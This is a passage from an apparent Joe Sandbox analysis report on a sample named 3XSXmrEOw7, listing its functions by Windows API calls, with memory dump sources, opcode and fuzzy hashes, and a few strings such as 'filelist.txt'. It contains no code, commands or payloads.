                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 670545878-0
                                                                                                                        • Opcode ID: da300db30e8049e3ec1625432519c923677dbe9daae775b9aee8c1666cefe3f9
                                                                                                                        • Instruction ID: b535a82bad788ac16eb99c34fc1ef6d385c7c7cd006b6a644f81288a5402ee46
                                                                                                                        • Opcode Fuzzy Hash: da300db30e8049e3ec1625432519c923677dbe9daae775b9aee8c1666cefe3f9
                                                                                                                        • Instruction Fuzzy Hash: 451191326073316796317BAB9C4472BA6987F6EB61F161126EC04E3384DB68CC02469E
                                                                                                                        APIs
                                                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 0041AF78
                                                                                                                        • GetFileTime.KERNEL32(00000000,?,?,?), ref: 0041AF90
                                                                                                                        • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0041AFA4
                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0041AFB4
                                                                                                                        • SetFileTime.KERNEL32(00000000,?,?,?), ref: 0041AFC8
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041AFCF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileTime$CloseCreateDateHandleLocal
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3223929235-0
                                                                                                                        • Opcode ID: 289a22b9c0c4734f6dc7b2019d8550f4d5a2ef4f98a2c5b37f485c35ec0a9aa1
                                                                                                                        • Instruction ID: 3d40798e3b81d1430aab252964cec3372e3fcf11f7589a68c7364f8788f44102
                                                                                                                        • Opcode Fuzzy Hash: 289a22b9c0c4734f6dc7b2019d8550f4d5a2ef4f98a2c5b37f485c35ec0a9aa1
                                                                                                                        • Instruction Fuzzy Hash: 3F014F76204302BFD704EF64DD49F9B77ACFF8A704F008918F645D6090E6B0A6098BAA
                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 00419247
                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00419257
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory
                                                                                                                        • String ID: %s\Support\$%s\filelist.txt$Cleanup
                                                                                                                        • API String ID: 1611563598-1950755567
                                                                                                                        • Opcode ID: ee110e23e56ea5e3512cdd37e5712b00be880ddb09ff6c44dc3f432a7db78bd4
                                                                                                                        • Instruction ID: bed570faa51ef1bb4b8ee522f0adb72f7e314e0fe85be6cbe2c67c94b7ad8b4a
                                                                                                                        • Opcode Fuzzy Hash: ee110e23e56ea5e3512cdd37e5712b00be880ddb09ff6c44dc3f432a7db78bd4
                                                                                                                        • Instruction Fuzzy Hash: 74512570304704ABD310EF658851BEFB7E5AFC9B08F40490EF54957282DF38A9498BAE
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: GlobalLocklstrlen
                                                                                                                        • String ID: System
                                                                                                                        • API String ID: 1144527523-3470857405
                                                                                                                        • Opcode ID: cf0ec0ccca7ebb9e06f2bad1568c3fb91d6ddb1b9ca79714ce062c2dd4892274
                                                                                                                        • Instruction ID: eea6c33846d3fd7b44d8b3261e131be6795de2e39f67e8c264ccda5b0592d447
                                                                                                                        • Opcode Fuzzy Hash: cf0ec0ccca7ebb9e06f2bad1568c3fb91d6ddb1b9ca79714ce062c2dd4892274
                                                                                                                        • Instruction Fuzzy Hash: B441DE32900219EFCB10DFB9C88699EBBB8FF08314F10922AE916D7241DB389945CF94
                                                                                                                        APIs
                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00416C83
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 00416C93
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 00416CF4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory
                                                                                                                        • String ID: DEBUG$DirectX Reports Reboot Required
                                                                                                                        • API String ID: 1611563598-3080797097
                                                                                                                        • Opcode ID: b2194924fa359db824beff28826ac9d5e50a418adaf161a9184b89560ac98817
                                                                                                                        • Instruction ID: b7ca4d720214f3a145d37d4fa28bcfc633ca5049e0a52a545d8ad53e3cccdc6a
                                                                                                                        • Opcode Fuzzy Hash: b2194924fa359db824beff28826ac9d5e50a418adaf161a9184b89560ac98817
                                                                                                                        • Instruction Fuzzy Hash: 6C110C713803415BD3205728DC41BE77794DB56715F06041BF9D5572C1DABAD4C4C2BA
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(mscoree.dll), ref: 004248CA
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004248DA
                                                                                                                        • ExitProcess.KERNEL32 ref: 004248EE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressExitHandleModuleProcProcess
                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                        • API String ID: 75539706-1276376045
                                                                                                                        • Opcode ID: 6b24fa057879b27e84c07b851d12f55b6a5d25cb9880573ffe5691b15abb3787
                                                                                                                        • Instruction ID: 1eadc9780b94b6718706bd16444dc68ece41e54e59adc106cdd0224a4c3c19fa
                                                                                                                        • Opcode Fuzzy Hash: 6b24fa057879b27e84c07b851d12f55b6a5d25cb9880573ffe5691b15abb3787
                                                                                                                        • Instruction Fuzzy Hash: DAD0C778351341BBD7103F70DD5AE2A7654EF42F0670504357805D0061CB38C900ED2A
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,00424291,?), ref: 0042A4C5
                                                                                                                        • InterlockedExchange.KERNEL32(00480B80,00000001), ref: 0042A543
                                                                                                                        • InterlockedExchange.KERNEL32(00480B80,00000000), ref: 0042A5A8
                                                                                                                        • InterlockedExchange.KERNEL32(00480B80,00000001), ref: 0042A5CC
                                                                                                                        • InterlockedExchange.KERNEL32(00480B80,00000000), ref: 0042A62C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExchangeInterlocked$QueryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2947987494-0
                                                                                                                        • Opcode ID: 0297ce39435e4b8cf295999e0ec9787d67faa8cead9ee7d4ded0a95dc7049a43
                                                                                                                        • Instruction ID: dd5010c10e1d9b9ba543a85cf015812fd413b34cf2729769e49068ff06a4fc39
                                                                                                                        • Opcode Fuzzy Hash: 0297ce39435e4b8cf295999e0ec9787d67faa8cead9ee7d4ded0a95dc7049a43
                                                                                                                        • Instruction Fuzzy Hash: FE5107307106219FCB248B58E98472B73A0EB91758FA9856BDC4187291D378EC96874F
                                                                                                                        APIs
                                                                                                                        • GetStartupInfoA.KERNEL32(?), ref: 0042D553
                                                                                                                        • GetFileType.KERNEL32(?), ref: 0042D5FD
                                                                                                                        • GetStdHandle.KERNEL32(-000000F6), ref: 0042D67E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileHandleInfoStartupType
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2461013171-0
                                                                                                                        • Opcode ID: 0b4af883c50a95dcf51d24fd18dda45df69003270a224a9e762e8201fdac76db
                                                                                                                        • Instruction ID: 44458137fe5f849726c5f7ea3ed5670e5a8521186f189f810873b1cd4ff4ad7e
                                                                                                                        • Opcode Fuzzy Hash: 0b4af883c50a95dcf51d24fd18dda45df69003270a224a9e762e8201fdac76db
                                                                                                                        • Instruction Fuzzy Hash: BA51C571A043118FD720CF28E84476B77E4FB16328F558A2ED5AAC72E1DB78D849C719
                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,?), ref: 0042F0C8
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,?,00000000), ref: 0042F129
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 626452242-0
                                                                                                                        • Opcode ID: 1b18a38131ce7fce63ae30e6e84db181954860e2b4c12b5ea27fecefa44c3926
